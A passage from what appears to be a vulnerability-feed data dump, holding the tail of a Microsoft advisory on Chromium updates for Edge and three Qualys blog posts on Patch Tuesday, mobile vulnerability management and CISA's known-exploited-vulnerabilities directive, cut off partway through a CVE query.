[CVE-2020-6401](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6401>), [CVE-2020-6402](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6402>), [CVE-2020-6404](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6404>), [CVE-2020-6405](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-220-6405>), [CVE-2020-6406](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6406>), [CVE-2019-19923](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19923>), [CVE-2020-6408](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6408>), [CVE-2020-6409](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6409>), [CVE-2020-6410](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6410>), [CVE-2020-6411](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6411>), [CVE-2020-6412](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6412>), [CVE-2020-6413](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6413>), [CVE-2020-6414](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6414>), [CVE-2020-6415](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6415>), [CVE-2020-6416](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6416>), [CVE-2020-6417](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6417>) \n79.0.309.68 | 1/17/2020 | 79.0.3945.130 | Critical | [CVE-2020-6378](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6378>), [CVE-2020-6379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6379>), [CVE-2020-6380](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6380>), [CVE-2020-0601](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0601>) \n \n* CVE\u2019s in **bold** have been reported to be exploited in the wild.\n\n**How can I see the version of the browser?**\n\n 1. In your Microsoft Edge browser, click on the 3 dots (...) on the very right-hand side of the window\n 2. Click on **Help and Feedback**\n 3. Click on **About Microsoft Edge**\n", "edition": 1, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-28T08:00:00", "type": "mscve", "title": "Chromium Security Updates for Microsoft Edge (Chromium-Based)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6408", "CVE-2021-21108", "CVE-2021-21114", "CVE-2020-16024", "CVE-2020-6409", "CVE-2020-16043", "CVE-2020-6548", "CVE-2020-6518", "CVE-2020-6464", "CVE-2020-16026", "CVE-2020-15965", "CVE-2020-16012", "CVE-2020-16000", "CVE-2020-6395", "CVE-2020-6569", "CVE-2020-6445", "CVE-2020-6454", "CVE-2020-6381", "CVE-2020-16011", "CVE-2020-15979", "CVE-2020-6428", "CVE-2020-6564", "CVE-2020-6424", "CVE-2020-6446", "CVE-2020-6458", "CVE-2020-6394", "CVE-2020-6397", "CVE-2020-15962", "CVE-2020-6506", "CVE-2020-6468", "CVE-2020-6831", "CVE-2020-15969", "CVE-2020-16007", "CVE-2020-6570", "CVE-2020-6533", "CVE-2020-6434", "CVE-2020-16032", "CVE-2020-6561", "CVE-2020-6432", "CVE-2020-6540", "CVE-2020-6559", "CVE-2020-6447", "CVE-2020-6545", "CVE-2020-6554", "CVE-2020-6566", "CVE-2020-1341", "CVE-2020-6399", "CVE-2020-6452", "CVE-2020-6483", "CVE-2020-6392", "CVE-2020-6387", "CVE-2020-6482", "CVE-2020-6528", "CVE-2020-6563", "CVE-2020-16031", "CVE-2020-15974", "CVE-2020-16030", "CVE-2020-16039", "CVE-2020-6486", "CVE-2020-6412", "CVE-2020-15960", "CVE-2020-6389", "CVE-2020-6390", "CVE-2020-6407", "CVE-2020-6494", "CVE-2020-6547", "CVE-2020-6529", "CVE-2020-6476", "CVE-2021-21116", "CVE-2020-15999", "CVE-2020-6507", "CVE-2020-6537", "CVE-2020-6416", "CVE-2020-6410", "CVE-2020-6460", "CVE-2020-6560", "CVE-2020-16027", "CVE-2020-16009", "CVE-2020-6461", "CVE-2021-21107", "CVE-2020-6574", "CVE-2020-6479", "CVE-2020-6511", "CVE-2020-6568", "CVE-2020-6386", "CVE-2020-6459", "CVE-2020-15982", "CVE-2020-6542", "CVE-2020-15968", "CVE-2020-6396", "CVE-2020-16002", "CVE-2020-6474", "CVE-2020-6467", "CVE-2020-6383", "CVE-2020-15975", "CVE-2020-6465", "CVE-2020-15985", "CVE-2020-6538", "CVE-2020-6493", "CVE-2020-6550", "CVE-2020-16001", "CVE-2020-6534", "CVE-2020-16023", "CVE-2020-16042", "CVE-2020-16029", "CVE-2020-6437", "CVE-2020-6444", "CVE-2020-15989", "CVE-2020-6451", "CVE-2020-6532", "CVE-2020-6521", "CVE-2021-21109", "CVE-2020-6429", "CVE-2020-6427", "CVE-2020-6536", "CVE-2020-6439", "CVE-2020-15972", "CVE-2020-6385", "CVE-2020-16005", "CVE-2020-6401", "CVE-2019-19926", "CVE-2020-15966", "CVE-2020-16004", "CVE-2020-6535", "CVE-2019-19925", "CVE-2020-16008", "CVE-2020-6455", "CVE-2020-6571", "CVE-2020-6519", "CVE-2020-6414", "CVE-2020-6391", "CVE-2020-6472", "CVE-2020-16016", "CVE-2020-6420", "CVE-2020-6417", "CVE-2020-16041", "CVE-2020-6530", "CVE-2020-6481", "CVE-2020-6431", "CVE-2020-6520", "CVE-2020-6411", "CVE-2021-21106", "CVE-2020-6522", "CVE-2019-19880", "CVE-2020-15963", "CVE-2020-6422", "CVE-2020-16040", "CVE-2020-16034", "CVE-2020-15964", "CVE-2020-6400", "CVE-2020-6398", "CVE-2020-6388", "CVE-2020-6413", "CVE-2020-6555", "CVE-2020-6448", "CVE-2020-6426", "CVE-2020-15973", "CVE-2020-16022", "CVE-2020-15987", "CVE-2021-21112", "CVE-2020-15995", "CVE-2020-15971", "CVE-2019-8075", "CVE-2020-6469", "CVE-2020-6512", "CVE-2020-6449", "CVE-2020-15991", "CVE-2020-6435", "CVE-2020-6489", "CVE-2019-18197", "CVE-2020-6456", "CVE-2020-6567", "CVE-2020-16033", "CVE-2020-6514", "CVE-2019-19923", "CVE-2020-6576", "CVE-2020-6473", "CVE-2020-6543", "CVE-2020-16014", "CVE-2020-6415", "CVE-2020-6539", "CVE-2020-6379", "CVE-2020-6466", "CVE-2020-6423", "CVE-2020-16003", "CVE-2020-16006", "CVE-2021-21115", "CVE-2020-16036", "CVE-2020-6515", "CVE-2021-21111", "CVE-2020-6551", "CVE-2020-6575", "CVE-2020-6488", "CVE-2020-6438", "CVE-2020-6552", "CVE-2020-6441", "CVE-2020-6443", "CVE-2020-6513", "CVE-2020-6380", "CVE-2020-6478", "CVE-2020-15977", "CVE-2021-21113", "CVE-2020-6480", "CVE-2020-6487", "CVE-2020-16013", "CVE-2020-6557", "CVE-2020-6556", "CVE-2020-6523", "CVE-2020-6558", "CVE-2020-16038", "CVE-2020-6505", "CVE-2020-16018", "CVE-2020-16025", "CVE-2020-6442", "CVE-2020-16037", "CVE-2021-21110", "CVE-2020-6404", "CVE-2020-6546", "CVE-2020-6526", "CVE-2020-15990", "CVE-2020-16015", "CVE-2020-6436", "CVE-2020-16028", "CVE-2020-6382", "CVE-2020-6490", "CVE-2020-6406", "CVE-2020-6553", "CVE-2020-6433", "CVE-2020-6402", "CVE-2020-6549", "CVE-2020-6418", "CVE-2020-6496", "CVE-2020-15981", "CVE-2020-6516", "CVE-2020-6450", "CVE-2020-6525", "CVE-2020-6562", "CVE-2020-15961", "CVE-2020-6430", "CVE-2020-6425", "CVE-2020-6527", "CVE-2020-0601", "CVE-2020-6541", "CVE-2020-6440", "CVE-2020-6405", "CVE-2020-6517", "CVE-2020-6384", "CVE-2020-6462", "CVE-2020-6378", "CVE-2020-6471", "CVE-2020-6393", "CVE-2020-6475", "CVE-2019-20503", "CVE-2020-16017", "CVE-2020-15988", "CVE-2020-6470", "CVE-2020-6524", "CVE-2020-6484", "CVE-2020-6531", "CVE-2020-6510", "CVE-2020-6544", "CVE-2020-6457", "CVE-2020-15992", "CVE-2020-15959", "CVE-2020-6495", "CVE-2020-6509"], "modified": "2021-01-21T08:00:00", "id": "MS:ADV200002", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/ADV200002", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2020-06-03T17:50:28", "description": "This month\u2019s Microsoft Patch Tuesday addresses 113 vulnerabilities with 19 of them labeled as Critical. The 19 Critical vulnerabilities cover Adobe Font Manager Library (0-day), SharePoint, Hyper-V, Scripting Engines, Media Foundation, Microsoft Graphics, Windows Codecs, and Dynamics Business Central. Adobe released patches today for ColdFusion, After Effects, and Digital Editions.\n\n### Workstation Patches\n\nThe Scripting Engine, Adobe Font Manager Library, Media Foundation, Microsoft Graphics, and Windows Codecs patches should be prioritized for workstation-type devices, meaning any system that is used for email or to access the internet via a browser. This includes multi-user servers that are used as remote desktops for users.\n\n### Windows Kernel Privilege Escalation\n\nWhile listed as Important, there is also an Actively Attacked privilege escalation vulnerability ([CVE-2020-1027](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1027>)) in the Windows Kernel. Often privilege escalation vulnerabilities are \"chained\" with other vulnerabilities resulting in a full system compromise. This patch should be prioritized across all Windows devices.\n\n### Adobe Font Manager Library 0-day\n\nMicrosoft patched two Actively Attacked vulnerabilities ([CVE-2020-0938](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0938>), [CVE-2020-1020](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1020>)) in the Adobe Font Manager Library that were [announced](<https://blog.qualys.com/laws-of-vulnerabilities/2020/03/25/automatically-discover-prioritize-and-remediate-windows-adobe-type-manager-library-remote-code-execution-vulnerability-adv200006-using-qualys-vmdr>) in March. While Windows 10 systems are partially mitigated against the exploit, all Windows workstations should be prioritized for patching.\n\n### Hyper-V Hypervisor Escape\n\nA remote code execution vulnerability ([CVE-2020-0910](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0910>)) is patched in Hyper-V that would allow an authenticated user on a guest system to run arbitrary code on the host system. Microsoft notes that exploitation of this vulnerability is less likely, but these patches should still be prioritized for all Hyper-V systems.\n\n### SharePoint\n\nMicrosoft has also released patches for SharePoint covering four RCE vulnerabilities ([CVE-2020-0929](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0929>), [CVE-2020-0931](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0931>), [CVE-2020-0932](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0932>), [CVE-2020-0974](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0974>)), and one XSS ([CVE-2020-0927](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0927>)). The four RCEs involve uploading a malicious application package to exploit the vulnerabilities. These patches should be prioritized for all SharePoint servers.\n\n### Dynamics Business Central RCE\n\nSimilar to [last month's release](<https://blog.qualys.com/laws-of-vulnerabilities/2020/03/10/march-2020-patch-tuesday-115-vulns-26-critical-microsoft-word-and-workstation-patches>), Dynamics Business Central is affected by a Remote Code Execution vulnerability ([CVE-2020-1022](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1022>)) that could allow attackers to execute arbitrary shell commands on a target system. While this vulnerability is labeled as \u201cExploitation Less Likely,\u201d considering the target is likely a critical server, this should be prioritized across all Dynamics BC/NAV systems.\n\n### Adobe\n\nAdobe issued patches today covering multiple vulnerabilities in [ColdFusion](<https://helpx.adobe.com/security/products/coldfusion/apsb20-18.html>), [After Effects](<https://helpx.adobe.com/security/products/after_effects/apsb20-21.html>), and [Digital Editions](<https://helpx.adobe.com/security/products/Digital-Editions/apsb20-23.html>). The patches for ColdFusion are labeled as [Priority 2](<https://helpx.adobe.com/security/severity-ratings.html>), with the others are set to [Priority 3](<https://helpx.adobe.com/security/severity-ratings.html>). All patches are labeled as \"Important.\"\n\nWhile none of the vulnerabilities disclosed in Adobe\u2019s release are known to be Actively Attacked today, all patches should be prioritized on systems with these products installed.\n\nPatch Tuesday QIDs are published at [Security Alerts](<https://www.qualys.com/research/security-alerts/>), typically late in the evening of Patch Tuesday.", "cvss3": {}, "published": "2020-04-14T18:34:04", "type": "qualysblog", "title": "April 2020 Patch Tuesday \u2013 113 Vulns, 19 Critical, Zero-Day Patches, SharePoint, Adobe ColdFusion", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2020-0910", "CVE-2020-0927", "CVE-2020-0929", "CVE-2020-0931", "CVE-2020-0932", "CVE-2020-0938", "CVE-2020-0974", "CVE-2020-1020", "CVE-2020-1022", "CVE-2020-1027"], "modified": "2020-04-14T18:34:04", "id": "QUALYSBLOG:CD5A810958CA7B4F6BB934D2C74500EA", "href": "https://blog.qualys.com/category/vulnerabilities-research", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-02-11T22:27:16", "description": "As mobile devices have become ubiquitous in almost every business process, whether in bank branches, manufacturing sites or retail stores, they are now hosting business applications and data that is subject to regulatory compliance and security. With access to critical corporate resources inside the corporate network, these mobile devices have become critical assets for the organization.\n\n### Mobile Attack Surface Challenges\n\nAlongside this trend, there has been a drastic rise in Android, iOS, and iPadOS vulnerabilities and an increased number of vulnerable apps distributed from authorized app stores. Through these vectors, mobile devices have become preferred targets for attackers to gain an entry point into corporate networks. Last year, for example, [900 million Apple iOS users were affected](<https://www.forbes.com/sites/gordonkelly/2020/05/13/apple-iphone-exploit-vulnerability-ios-13-mail-problem-update-iphone-11-pro-max-u-iphone-xs-max-xr-upgrade/?sh=45195bbc07b7>) by iOS mail app vulnerability CVE-2020-9819 and CVE-2020-9818 exploit. Zecops [demonstrated how to exploit](<https://blog.zecops.com/vulnerabilities/seeing-maildemons-technique-triggers-and-a-bounty/>) these vulnerabilities (MailDemon) by sending oversized email to victims\u2019 devices.\n\nIn another attack, Android mobile devices [were targeted](<https://www.zdnet.com/article/google-reveals-sophisticated-windows-android-hacking-operation/>) using the Google Chrome app vulnerability CVE-2020-6418, a type of bug that incorrectly implements relevant security checks. The attacker tricked victims into visiting a specially crafted web page that gave the attacker an initial foothold on the victim\u2019s device via their browser. The attacker then deployed OS-level vulnerability CVE-2019-2215 to gain privileged control of the victim\u2019s device including access to their data and the corporate network.\n\nIn both cases, the attacks were successful because the organizations were using a traditional vulnerability scanning approach for mobile devices. This approach fails to provide holistic security for mobile devices because it requires devices to connect to the VPN or the organization\u2019s network in order to be scanned for vulnerabilities or patched. Mobile Device Management (MDM) also fails in this case because its \u2018policy-based prevention\u2019 does not assess devices or the apps running on them for the latest vulnerabilities, and it lacks knowledge of the security posture of the device and does not provide flexible patching. \n\nOrganizations are looking for a solution which provides continuous visibility into mobile devices across the enterprise, continuous visibility into the vulnerability and misconfiguration posture of the device and apps, and a workflow for prioritized updates and patching.\n\n### Introducing Qualys VMDR for Mobile Devices\n\nBuilt on the FedRAMP-authorized [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>), [Qualys VMDR for Mobile Devices](<https://www.qualys.com/vmdr-mobile-devices>) extends vulnerability management, detection and response capabilities to mobile device platforms such as Android, iOS, and iPadOS. Qualys Cloud Agent for Android, iOS and iPadOS, available on Google Play Store and Apple App Store, provides continuous visibility, security and patch orchestration for your mobile platforms.\n\nTo learn more about this solution, watch the webinar on March 10: [Seamlessly Expand Vulnerability & Patch Management to Enterprise Mobile Devices](<https://www.brighttalk.com/webcast/11673/469503>).\n\n#### Continuous Visibility and Monitoring of Mobile Devices Connecting to Your Network\n\nKnowing your mobile devices and monitoring their connections to your corporate network is fundamental to their security. With cloud agents deployed on your mobile devices, you get real-time visibility of all the mobile devices across your enterprise, including critical hardware and software details like firmware, OS, and installed applications details, along with location and the network information.\n\nThis mobile device inventory comes as a part of [Qualys VMDR](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) and [Multi-Vector EDR](<https://www.qualys.com/apps/endpoint-detection-response/>).\n\n![](https://blog.qualys.com/wp-content/uploads/2021/02/Inventory-Asset-Listing-page--1070x573.png)Gain in-depth visibility into mobile devices across your enterprise\n\n#### Real-Time Visibility into Vulnerabilities and Critical Device Settings\n\nWith best-in-class vulnerability assessment for Android, iOS and iPadOS devices, Qualys VMDR for Mobile Devices enables:\n\n * Device vulnerability and exploit assessment covering vulnerabilities from 2016 to the latest for Android, iOS, and iPadOS providing insights into vulnerable OS versions with CVE details and detection of jailbroken/rooted devices,\n * Detection of critical device settings such as encryption disabled, password removed/disabled, Bluetooth settings, etc.,\n * Assessment of app vulnerability detections covering vulnerabilities from 2016 to the latest such as Google Chrome browser vulnerabilities, along with the detection of potentially harmful apps, and\n * Insights into network vulnerabilities and detection of devices connected to insecure or open Wi-Fi networks.\n\nQualys VMDR helps expand your vulnerability management program with configuration assessment by continuously monitoring the critical mobile device configurations as recommended by [National Security Agency (NSA) best practices](<https://www.nsa.gov/What-We-Do/Cybersecurity/Telework-and-Mobile-Security-Guidance/>), such as Bluetooth status, location services, app trusted status, and more.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/02/Vulnerability-Listing-Page-1070x611.png)Real-time visibility into vulnerabilities ![](https://blog.qualys.com/wp-content/uploads/2021/02/Asset_settings_N-1070x677.png)Real-time visibility into critical settings\n\n#### Remote Response and Seamless Patch Orchestration\n\nTwo of the biggest response challenges in the mobile world are:\n\n * Performing remote actions when the mobile device is not on the VPN or network, i.e. when traditional vulnerability management approaches are not possible, and\n * Determining the appropriate mitigation action, which requires time-consuming research to map application updates to vulnerabilities and then either deploy those updates or uninstall the risky apps.\n\nQualys VMDR for Mobile Devices automatically and continuously correlates the vulnerabilities of Android apps available on Google Play Store with appropriate application updates, significantly decreasing your remediation response time. IT and remediation teams can schedule and deploy those patches from Google Play Store via seamless orchestration provided by VMDR or they can uninstall vulnerable apps.\n\nBased on the security posture of the device, security teams can take actions on all at-risk mobile devices simultaneously, even if the devices are not connected to the VPN or corporate network, leveraging over-the-air, out-of-the-box controls to reset in critical cases or lock devices, change passcodes, or even de-enroll the device.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/02/Jobs_listing-page-1070x713.png)Seamless patch orchestration with tracking patch status ![](https://blog.qualys.com/wp-content/uploads/2021/02/Apps_N-1070x629.png)Uninstall the vulnerable app ![](https://blog.qualys.com/wp-content/uploads/2021/02/Actions_N-1070x629.png)Perform remote actions on the vulnerable devices\n\n#### Vulnerability Posture of Mobile Devices AND Servers in a Single Pane of Glass\n\nOne of the key metrics for vulnerability risk management teams and management is visualization of vulnerability and security posture across hybrid environments, from datacenter servers to endpoints to mobile devices. With mobile data flowing to the Qualys Cloud Platform via VMDR for Mobile Devices, your vulnerability and security teams can continuously inventory all your assets, including mobile devices, in a consolidated manner and gain insights into the vulnerability and misconfiguration posture of your servers and mobile devices in a single pane of glass.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/02/GAI-Dashboard-1070x1544.png)Gain visibility into the security posture of different types of assets in a single pane of glass.\n\n### Visibility, Assessment, Correlation and Orchestration\n\nWith the growth of mobile devices, increasing attack surface and data exposure risks, security teams are looking for a solution which goes beyond traditional mobile vulnerability scanning tools. Qualys VMDR for Mobile Devices extends the power of vulnerability & patch management to Android, iOS and iPadOS devices for: \n\n * Compressive visibility into mobile devices, installed apps, and configurations, even if they are not on VPN or network,\n * Continuous vulnerability and end-of-life assessment of devices, OSs, and applications along with monitoring for potential harmful applications,\n * Automatic correlation of vulnerabilities with apps and Android patches, and\n * Orchestration of appropriate response actions such as deploying patches from Google Play Store or uninstalling vulnerable apps.\n\n### Learn More\n\n * Webinar March 10: [Seamlessly Expand Vulnerability & Patch Management to Enterprise Mobile Devices](<https://www.brighttalk.com/webcast/11673/469503>)\n * [Start your free trial](<https://www.qualys.com/try-vmdr-mobile-devices>)\n * [About VMDR for Mobile Devices](<https://www.qualys.com/apps/vulnerability-management-detection-response/mobile-devices>)\n * [User guide](<https://www.qualys.com/docs/qualys-sem-user-guide.pdf>)\n * [Qualys extends the power of VMDR to Android and iOS/iPadOS mobile devices](<https://www.qualys.com/company/newsroom/news-releases/usa/qualys-introduces-vmdr-for-mobile-devices>)", "cvss3": {}, "published": "2021-02-10T21:17:00", "type": "qualysblog", "title": "Expand Your Vulnerability & Patch Management Program to Mobile Devices with Qualys VMDR", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-2215", "CVE-2020-6418", "CVE-2020-9818", "CVE-2020-9819"], "modified": "2021-02-10T21:17:00", "id": "QUALYSBLOG:65D9653A8189263EAD9C1C00AA7E205A", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-25T19:27:09", "description": "_CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively._\n\n### Situation\n\nLast November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>) called \u201cReducing the Significant Risk of Known Exploited Vulnerabilities.\u201d [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of Known Exploited Vulnerabilities that carry significant risk to the federal government and sets requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires federal agencies to review and update internal vulnerability management procedures to remediate each vulnerability according to the timelines outlined in CISA\u2019s vulnerability catalog.\n\n### Directive Scope\n\nThis CISA directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency\u2019s behalf.\n\nHowever, CISA strongly recommends that public and private businesses as well as state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA\u2019s public catalog. This is truly vulnerability management guidance for all organizations to heed.\n\n### CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [379 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. CISA\u2019s most recent update was issued on February 22, 2022.\n\nThe Qualys Research team is continuously updating CVEs to available QIDs (Qualys vulnerability identifiers) in the Qualys Knowledgebase, with the RTI field \u201cCISA Exploited\u201d and this is going to be a continuous approach, as CISA frequently amends with the latest CVE as part of their regular feeds.\n\nOut of these vulnerabilities, Directive 22-01 urges all organizations to reduce their exposure to cyberattacks by effectively prioritizing the remediation of the identified Vulnerabilities.\n\nCISA has ordered U.S. federal agencies to apply patches as soon as possible. The remediation guidance is grouped into multiple categories by CISA based on attack surface severity and time-to-remediate. The timelines are available in the [Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) for each of the CVEs.\n\n### Detect CISA Vulnerabilities Using Qualys VMDR\n\nQualys helps customers to identify and assess the risk to their organizations\u2019 digital infrastructure, and then to automate remediation. Qualys\u2019 guidance for rapid response to Directive 22-01 follows.\n\nThe Qualys Research team has released multiple remote and authenticated detections (QIDs) for these vulnerabilities. Since the directive includes 379 CVEs (as of February 22, 2022) we recommend executing your search based on QQL (Qualys Query Language), as shown here for released QIDs by Qualys **_vulnerabilities.vulnerability.threatIntel.cisaKnownExploitedVulns:"true"_**\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/CISA-Actual-1.jpg)\n\n### CISA Exploited RTI\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using VMDR Prioritization. Qualys has introduced an **RTI Category, CISA Exploited**.\n\nThis RTI indicates that the vulnerabilities are associated with the CISA catalog.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/CISA-2.jpg)\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/CISA-3.jpg)\n\nWith Qualys Unified Dashboard, you can track your exposure to CISA Known Exploited Vulnerabilities and track your status and overall management in real-time. With dashboard widgets, you can keep track of the status of vulnerabilities in your environment using the [\u201cCISA 2010-21| KNOWN EXPLOITED VULNERABILITIES\u201d](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/CISA-4-scaled.jpg)\n\n### Remediation\n\nTo comply with this directive, federal agencies need to remediate all vulnerabilities as per the remediation timelines suggested in [CISA Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)**.**\n\nQualys patch content covers many Microsoft, Linux, and third-party applications. However, some of the vulnerabilities introduced by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch all the remaining CVEs in their list.\n\nCustomers can copy the following query into the Patch Management app to help customers comply with the directive\u2019s aggressive remediation timelines set by CISA. Running this query for specific CVEs will find required patches and allow quick and efficient deployment of those missing patches to all assets directly from within Qualys Cloud Platform.\n \n \n cve:[`CVE-2010-5326`,`CVE-2012-0158`,`CVE-2012-0391`,`CVE-2012-3152`,`CVE-2013-3900`,`CVE-2013-3906`,`CVE-2014-1761`,`CVE-2014-1776`,`CVE-2014-1812`,`CVE-2015-1635`,`CVE-2015-1641`,`CVE-2015-4852`,`CVE-2016-0167`,`CVE-2016-0185`,`CVE-2016-3088`,`CVE-2016-3235`,`CVE-2016-3643`,`CVE-2016-3976`,`CVE-2016-7255`,`CVE-2016-9563`,`CVE-2017-0143`,`CVE-2017-0144`,`CVE-2017-0145`,`CVE-2017-0199`,`CVE-2017-0262`,`CVE-2017-0263`,`CVE-2017-10271`,`CVE-2017-11774`,`CVE-2017-11882`,`CVE-2017-5638`,`CVE-2017-5689`,`CVE-2017-6327`,`CVE-2017-7269`,`CVE-2017-8464`,`CVE-2017-8759`,`CVE-2017-9791`,`CVE-2017-9805`,`CVE-2017-9841`,`CVE-2018-0798`,`CVE-2018-0802`,`CVE-2018-1000861`,`CVE-2018-11776`,`CVE-2018-15961`,`CVE-2018-15982`,`CVE-2018-2380`,`CVE-2018-4878`,`CVE-2018-4939`,`CVE-2018-6789`,`CVE-2018-7600`,`CVE-2018-8174`,`CVE-2018-8453`,`CVE-2018-8653`,`CVE-2019-0193`,`CVE-2019-0211`,`CVE-2019-0541`,`CVE-2019-0604`,`CVE-2019-0708`,`CVE-2019-0752`,`CVE-2019-0797`,`CVE-2019-0803`,`CVE-2019-0808`,`CVE-2019-0859`,`CVE-2019-0863`,`CVE-2019-10149`,`CVE-2019-10758`,`CVE-2019-11510`,`CVE-2019-11539`,`CVE-2019-1214`,`CVE-2019-1215`,`CVE-2019-1367`,`CVE-2019-1429`,`CVE-2019-1458`,`CVE-2019-16759`,`CVE-2019-17026`,`CVE-2019-17558`,`CVE-2019-18187`,`CVE-2019-18988`,`CVE-2019-2725`,`CVE-2019-8394`,`CVE-2019-9978`,`CVE-2020-0601`,`CVE-2020-0646`,`CVE-2020-0674`,`CVE-2020-0683`,`CVE-2020-0688`,`CVE-2020-0787`,`CVE-2020-0796`,`CVE-2020-0878`,`CVE-2020-0938`,`CVE-2020-0968`,`CVE-2020-0986`,`CVE-2020-10148`,`CVE-2020-10189`,`CVE-2020-1020`,`CVE-2020-1040`,`CVE-2020-1054`,`CVE-2020-1147`,`CVE-2020-11738`,`CVE-2020-11978`,`CVE-2020-1350`,`CVE-2020-13671`,`CVE-2020-1380`,`CVE-2020-13927`,`CVE-2020-1464`,`CVE-2020-1472`,`CVE-2020-14750`,`CVE-2020-14871`,`CVE-2020-14882`,`CVE-2020-14883`,`CVE-2020-15505`,`CVE-2020-15999`,`CVE-2020-16009`,`CVE-2020-16010`,`CVE-2020-16013`,`CVE-2020-16017`,`CVE-2020-17087`,`CVE-2020-17144`,`CVE-2020-17496`,`CVE-2020-17530`,`CVE-2020-24557`,`CVE-2020-25213`,`CVE-2020-2555`,`CVE-2020-6207`,`CVE-2020-6287`,`CVE-2020-6418`,`CVE-2020-6572`,`CVE-2020-6819`,`CVE-2020-6820`,`CVE-2020-8243`,`CVE-2020-8260`,`CVE-2020-8467`,`CVE-2020-8468`,`CVE-2020-8599`,`CVE-2021-